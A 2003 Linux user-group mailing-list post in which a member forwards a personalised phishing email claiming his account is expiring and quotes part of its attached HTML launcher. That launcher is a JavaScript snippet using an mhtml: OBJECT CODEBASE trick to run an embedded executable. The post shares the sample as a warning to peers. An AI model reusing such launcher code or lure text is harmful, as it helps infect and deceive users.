[ale] Interesting trojan attempt?

David S. Jackson dsj at sylvester.dsj.net
Sun Aug 3 16:26:55 EDT 2003 

This forwarded message came to me from my pop account at
Earthlink.  It has the Subject line:

Subject: [admin at sylvester.dsj.net: your account                         vjovvlov]

It looked kinda clever.  I don't think I've seen this before.
Somehow it snarfed my MX machine's name and stuck it into the
subject line and into the To:, Reply-To:, and From: address.  I
Almost thought it was real for a second.  I shouldn't be allowing
external queries from my internal DNS server anyway, so I'd
better make sure that didn't happen.

The attachment was a zip file labelled:  message.zip.

When I pipe the "message" to less through unzip -p, I get
compiled binary output followed by some "launch code" in an html
file:

<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no
bgcolor=white><FONT face=
"Arial" color=black
style="position:absolute;top:20;left:90;z-index:100; font-si
ze:12px;">No message</center><OBJECT style="cursor:cross-hair"
alt="moo ha ha" C
LASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="mhtml:'+path+'\\m
essage.html!File://foo.exe"></OBJECT>')
}

[ lots more html snipped... ]

Anyway, I guess you guys see this quite a bit, but I hadn't seen
anything quite so personalized before.  (Also, the X-Mailer:
attribution was kind of obvious.  And the timestamp was in PDT.)


----- Forwarded message from admin at sylvester.dsj.net -----

Received: from localhost (dsj at localhost [127.0.0.1])
	by sylvester.dsj.net (8.12.3/8.12.3/Debian-5) with ESMTP id h7385pXI009561
	for <dsj at localhost>; Sun, 3 Aug 2003 04:38:42 -0400
Received: from pop.dsj.net [207.217.120.137]
	by localhost with POP3 (fetchmail-5.9.11)
	for dsj at localhost (single-drop); Sun, 03 Aug 2003 04:38:42 -0400 (EDT)
Received: from localhost ([211.110.44.18])
	by tern (EarthLink Mail Service) with SMTP id 19Jdzq2Bj3NZFmh0
	for <dsj at dsj.net>; Sun, 3 Aug 2003 00:46:18 -0700 (PDT)
From: admin at sylvester.dsj.net
To: Dsj <dsj at dsj.net>
Reply-To: admin at sylvester.dsj.net
X-Mailer: The Bat! (v1.61)
X-Priority: 2 (High)
Subject: your account                         vjovvlov
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------5B228CBD052294B"
Message-Id: <200308030046.19Jdzq2Bj3NZFmh0 at tern>
Date: Sun, 3 Aug 2003 00:46:18 -0700 (PDT)
Status: RO
Content-Length: 29765
Lines: 402


Hello there,

I would like to inform you about important information regarding your
email address. This email address will be expiring.
Please read attachment for details.

---
Best regards, Administrator
vjovvlov



----- End forwarded message -----


-- 
David S. Jackson                        dsj at dsj.net
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thank goodness modern convenience is a thing of the
remote future.
		-- Pogo, by Walt Kelly
_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale

More information about the Ale mailing list